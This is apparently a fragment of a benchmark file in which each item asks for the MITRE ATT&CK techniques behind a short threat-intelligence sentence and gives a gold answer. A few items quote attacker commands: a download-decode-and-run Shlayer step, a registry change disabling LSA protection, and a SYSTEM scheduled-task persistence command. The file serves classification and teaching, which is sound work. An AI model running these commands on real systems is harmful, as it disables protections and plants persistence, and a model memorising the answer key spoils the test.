/tmp/.info.py The first part of the command downloads an encoded file from a Github page belonging to a user named youarenick\" and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.\"\n\t - T1553.001: Subvert Trust Controls - Gatekeeper Bypass\n- Text: For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter \u2014 the Linux kernel firewall \u2014 using the iptc_insert_entry() function from libiptc1 to allow output communication to it\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: Magic Hound has disabled LSA protection on compromised hosts using `\"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v RunAsPPL /t REG_DWORD /d 0 /f`.\n\t - T1562: Impair Defenses\n", + "input": "OSX/Shlayer can disable Gatekeeper using the native \"spctl\" application.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sandworm Team has acquired open-source tools for some of it's operations; for example it acquired Invoke-PSImage to establish an encrypted channel from a compromised host to Sandworm Team's C2 server as part of its preparation for the 2018 Winter Olympics attack.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: Magic Hound has stolen domain credentials by dumping LSASS process memory with comsvcs.dll and from a Microsoft Active Directory Domain Controller using Mimikatz.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: Mimikatz's kerberos module can create golden tickets.\n\t - T1558.001: Steal or Forge Kerberos Tickets - Golden Ticket\n", + "input": "Blue Mockingbird has obtained and used tools such as Mimikatz.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT37 has a function in the initial dropper to bypass Windows UAC in order to execute the next payload with higher privileges.\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: ComRAT has encrypted and stored its orchestrator code in the Registry as well as a PowerShell script into the WsqmCons Registry key.\n\t - T1112: Modify Registry\n- Text: Kimsuky has a HWP document stealer module which changes the default program association in the registry to open HWP documents.\n\t - T1546.001: Event Triggered Execution - Change Default File Association\n", + "input": "Lokibot has modified the Registry as part of its UAC bypass process.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Proofpoint researchers frequently observe Silent Librarian\u2019s phishing attempts originating from a university unrelated to their current target using a separate, unrelated university\u2019s URL shortening service. This short URL links to a phishing landing page either directly or via one or more third-party sites that eventually lands the user on a clone of a login portal hosted on an actor-controlled server\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1598.003: Phishing for Information - Spearphishing Link\n\t - T1608.005: Stage Capabilities - Link Target\n- Text: TEMP.Veles has relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution.\n\t - T1021.004: Remote Services - SSH\n- Text: Interestingly, the actors chose to leverage Cobalt Strike for lateral movement. The first of several beacon files are dropped onto the same infected endpoint running Brute Ratel C4, with the first being:\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1588.001: Obtain Capabilities - Malware\n", + "input": "Lazarus Group has obtained a variety of tools for their operations, including Responder, PuTTy PSCP, Wake-On-Lan, ChromePass, and dbxcli.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Okrum can collect the victim username.\n\t - T1033: System Owner/User Discovery\n- Text: InvisiMole has a command to list account information on the victim\u2019s machine.\n\t - T1087.001: Account Discovery - Local Account\n- Text: Night Dragon has dumped account hashes with Carbanak and cracked them with Cain & Abel.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n", + "input": "Turian can retrieve usernames.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Expand can be used to download or copy a file into an alternate data stream.\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n- Text: Regin has used a hidden file system to store some of its components.\n\t - T1564.005: Hide Artifacts - Hidden File System\n- Text: The ZIP file contains a single .ISO file. The use of an ISO file is an attempt to defeat the \u201cMark of the Web (MOTW),\u201d which tags files as being downloaded from the internet. It subjects these files to additional security measures by Windows and endpoint security solutions.\n\t - T1553.005: Subvert Trust Controls - Mark-of-the-Web Bypass\n", + "input": "Anchor has used NTFS to hide files.", + "gold": "- T1564.004: Hide Artifacts - NTFS File Attributes", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pupy can migrate into another process using reflective DLL injection.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: PowerSploit reflectively loads a Windows PE file into a process.\n\t - T1620: Reflective Code Loading\n- Text: TajMahal has the ability to inject the \"LoadLibrary\" call template DLL into running processes.\n\t - T1129: Shared Modules\n", + "input": "Conti has loaded an encrypted DLL into memory and then executes it.", + "gold": "- T1055.001: Process Injection - Dynamic-link Library Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: POWRUNER may collect information on the victim's anti-virus software.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Ursnif droppers have used WMI classes to execute PowerShell commands.\n\t - T1047: Windows Management Instrumentation\n- Text: It also has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware (example in Figure 6\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "MoleNet can use WMI commands to check the system for firewall and antivirus software.", + "gold": "- T1518.001: Software Discovery - Security Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: captures screenshots of the victim\u2019s screen.\n\t - T1113: Screen Capture\n- Text: APT38 used a Trojan called KEYLIME to capture keystrokes from the victim\u2019s machine.\n\t - T1056.001: Input Capture - Keylogging\n- Text: NanoCore can access the victim's webcam and capture data.\n\t - T1125: Video Capture\n", + "input": "KEYMARBLE can capture screenshots of the victim\u2019s machine.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.\n\t - T1113: Screen Capture\n- Text: Empire can capture webcam data on Windows and macOS systems.\n\t - T1125: Video Capture\n- Text: All this information is stored in the C:\\Users\\Public\\Videos\\si.ini file and sent in an email message, as an attachment, via SMTPS, using the default port 465. The email body contains the string SI (which probably stands for System Information), the recipient is sym777.g@post.cz. For all email exchange, the message\u2019s Subject: set to the id\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "Kazuar captures screenshots of the victim\u2019s screen.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WannaCry encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files.\n\t - T1486: Data Encrypted for Impact\n- Text: Now the virtual environment is prepared, the install.bat command goes through a list of process names and terminates these processes so any files they have open are unlocked and become accessible for encryption. This list of 50 entries consists of mainly line-of-business applications, database, remote management and backup applications and is stored in a text file. Another text file contains services names. These are tailored to the victim organization\u2019s network environment, including process and service names belonging to endpoint protection software\n\t - T1489: Service Stop\n- Text: Machete has used AES to exfiltrate documents.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "Babuk can use ChaCha8 and ECDH to encrypt data.", + "gold": "- T1486: Data Encrypted for Impact", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The code then uses the identified functions to add persistency through registry and add next stages file names identifier through the following locations\n\t - T1037.001: Boot or Logon Initialization Scripts - Logon Script (Windows)\n- Text: has used a tool known as RemoteExec (similar to ) to remotely execute batch scripts and binaries.\n\t - T1569.002: System Services - Service Execution\n- Text: BLINDINGCAN has loaded and executed DLLs in memory during runtime on a victim machine.\n\t - T1129: Shared Modules\n", + "input": "Attor's dispatcher can be executed as a service.", + "gold": "- T1569.002: System Services - Service Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: used RDP to move laterally in victim networks.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: In this intrusion from December 2021, the threat actors utilized IcedID as the initial access vector. IcedID is a banking trojan that first appeared in 2017, usually, it is delivered via malspam campaigns and has been widely used as an initial access vector in multiple ransomware intrusions. Upon execution of\u2026 .\n\t - T1219: Remote Access Software\n- Text: One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. The RAT will answer the \"who\" command with a string that contains the username, computer name and the previously generated UUID. The \"ice\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n", + "input": "Cobalt Strike can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.", + "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It\u2019s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not.\n\t - T1596.003: Search Open Technical Databases - Digital Certificates\n- Text: APT28 has routed traffic over Tor and VPN servers to obfuscate their activities.\n\t - T1090.003: Proxy - Multi-hop Proxy\n- Text: For readers unaware of ngrok, this site is a simple reverse proxy used to let Internet-based users connect to servers located behind firewalls or on local machines that don't have a public IP address\n\t - T1090: Proxy\n", + "input": "Regin leveraged several compromised universities as proxies to obscure its origin.", + "gold": "- T1090.002: Proxy - External Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: parses the export tables of system DLLs to locate and call various Windows API functions.\n\t - T1106: Native API\n- Text: Carbon establishes persistence by creating a service and naming it based off the operating system version running on the current machine.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Apart from targeting Gmail users, Pawn Storm has also abused OAuth in credential phishing attacks against high profile Yahoo users. Here is an example from 2015 where \u201cMcAfee Email Protection\u201d is offered\n\t - T1528: Steal Application Access Token\n", + "input": "ZxShell can leverage native API including \"RegisterServiceCtrlHandler \" to register a service.RegisterServiceCtrlHandler", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once a file is uploaded, Machete will delete it from the machine.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: njRAT has modified the Windows firewall to allow itself to communicate through the firewall.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: BRONZE BUTLER has used \"net time\" to check the local time on a target system.\n\t - T1124: System Time Discovery\n", + "input": "The White Company has the ability to delete its malware entirely from the target system.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LazyScripter has leveraged dynamic DNS providers for C2 communications.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: Figure 32 shows QUADAGENT issuing DNS requests with incrementing sequence numbers and the C2 providing the session identifier and pre-shared key within the IPv6 answers. The screenshot also shows the Trojan sending a DNS query to notify the C2 that it successfully received the data.\n\t - T1583.002: Acquire Infrastructure - DNS Server\n- Text: No matching sample found for T1590.002\n", + "input": "FIN7 has performed C2 using DNS via A, OPT, and TXT records.", + "gold": "- T1071.004: Application Layer Protocol - DNS", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MacMa can collect the username from the compromised machine.\n\t - T1033: System Owner/User Discovery\n- Text: Bazar can identify administrator accounts on an infected host.\n\t - T1087.001: Account Discovery - Local Account\n- Text: Impacket modules like ntlmrelayx and smbrelayx can be used in conjunction with Network Sniffing and LLMNR/NBT-NS Poisoning and SMB Relay to gather NetNTLM credentials for Brute Force or relay attacks that can gain code execution.\n\t - T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay\n", + "input": "BISCUIT has a command to gather the username from the system.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Metamorfo has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.\n\t - T1119: Automated Collection\n- Text: PLATINUM has used keyloggers that are also capable of dumping credentials.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: However, for version 3 things are different.\u00a0 This is how the report of the email_accounts_grabber module appears for Emotet version 3:\n\t - T1129: Shared Modules\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1586.002: Compromise Accounts - Email Accounts\n", + "input": "Chimera has used custom DLLs for continuous retrieval of data from memory.", + "gold": "- T1119: Automated Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Enables remote login - Enables screen sharing - Configures remote login permissions for the user - Allows remote login to all - Enables a hidden \u201croot\u201d account in macOS and sets the password specified in the Trojan code\n\t - T1569.001: System Services - Launchctl\n- Text: Bankshot uses the command-line interface to execute arbitrary commands.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: SYNful Knock is malware that is inserted into a network device by patching the operating system image.\n\t - T1601.001: Modify System Image - Patch System Image\n", + "input": "MCMD can launch a console process (cmd.exe) with redirected standard input and output.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32's backdoor has used LZMA compression and RC4 encryption before exfiltration.\n\t - T1560: Archive Collected Data\n- Text: InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Metamorfo has encrypted C2 commands with AES-256.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "Exaramel for Windows automatically encrypts files before sending them to the C2 server.", + "gold": "- T1560: Archive Collected Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: At this point in the execution cycle, the FoggyWeb DLL is loaded into one or more application domains where the legitimate AD FS code is running. This means the backdoor code runs alongside the AD FS code with the same access and permissions as the AD FS application. Such access allows the FoggyWeb backdoor to directly interact with the AD FS codebase (that is, not an external disk-resident tool) and selectively invoke native AD FS methods needed to facilitate its malicious operations\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: establishes persistence by adding a new service with the display name \"WMI Performance Adapter Extension\" in an attempt to masquerade as a legitimate WMI service.\n\t - T1036: Masquerading\n- Text: Seasalt has masqueraded as a service called \"SaSaut\" with a display name of \"System Authorization Service\" in an apparent attempt to masquerade as a legitimate service.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "Bisonal has renamed malicious code to `msacm32.dll` to hide within a legitimate library; earlier versions were disguised as `winhelp`.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Proxysvc executes a binary on the system and logs the results into a temp file by using: \"cmd.exe /c \" > %temp%\\PM* .tmp 2>&1\"\".\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: During C0015, the threat actors used the command `net localgroup \"adminstrator\" ` to identify accounts with local administrator rights.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n- Text: ZxShell can check the services on the system.\n\t - T1007: System Service Discovery\n", + "input": "Caterpillar WebShell can run commands on the compromised asset with CMD functions.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In order to avoid in-memory scanning during runtime, the payload encrypts all of the function blocks before executing the actual malicious routine. Afterwards, whenever it needs to use a function, it will decrypt the function, execute it, and encrypt the function back again, as can be seen in Figure 4. If a function will not be used on the rest of the execution, it will be scrambled by another mess-up function, as illustrated in Figure 6. The mess-up function muddles up the bytes with random values and makes the input blocks unrecoverable. The purpose of this is to further avoid being detected by a certain cybersecurity solution\n\t - T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n- Text: This transport library does not appear on disk in its PE format. It is maintained as encrypted resource 107 in the orchestrator module, then decrypted and loaded by the orchestrator directly into the memory of the target process. This C2 interaction module is independent, once started, it interacts with the orchestrator using its local named pipe\n\t - T1027: Obfuscated Files or Information\n- Text: No matching sample found for T1574.004\n", + "input": "Based on comparison of Gazer versions, Turla made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.", + "gold": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Office365DCOMCheck or SystemDiskClean) as the name for the scheduled task to maintain persistence on the victim host\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: It looks like GrowlHelper creates an executable named Software Update Check when it thinks it\u2019s online. I was pretty excited when I first found this, but quickly realized it just drops a copy of itself with a different name\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "An APT3 downloader creates persistence by creating the following scheduled task: \"schtasks /create /tn \"mysc\" /tr C:\\Users\\Public\\test.exe /sc ONLOGON /ru \"System\"\".", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SMOKEDHAM has used \"net.exe user\" and \"net.exe users\" to enumerate local accounts on a compromised host.\n\t - T1087.001: Account Discovery - Local Account\n- Text: Dragonfly has used batch scripts to enumerate users on a victim domain controller.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Team member or team identifier Analysis of the OwaAuth web shell revealed a PDB string with the \"SyberSpace\" username (see Figure 20)\n\t - T1033: System Owner/User Discovery\n\t - T1505.003: Server Software Component - Web Shell\n", + "input": "SoreFang can collect usernames from the local system via \"net.exe user\".", + "gold": "- T1087.001: Account Discovery - Local Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This has led it to do more, such as: Communication with more C&C servers \u2013 up to 16 P2P communication between infected nodes MAC address check - PlugX runs if the MAC address of an infected host coincides with configuration information in itself (If not specified in the configuration, PlugX runs on any host)\n\t - T1082: System Information Discovery\n\t - T1016: System Network Configuration Discovery\n- Text: A VBScript receives a batch script to execute a set of commands in a command prompt.\n\t - T1119: Automated Collection\n- Text: Bazar can query the Registry for installed applications.\n\t - T1518: Software Discovery\n", + "input": "CharmPower can collect data and files from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: attachedTemplate.dotm xxx 11/15/18 05:35 11/15/18 05:35 109.248.148[.]42 Table 2 Remote templates downloaded by Dear Joohn delivery documents As seen in Table 1, the delivery documents accessed their respective remote templates 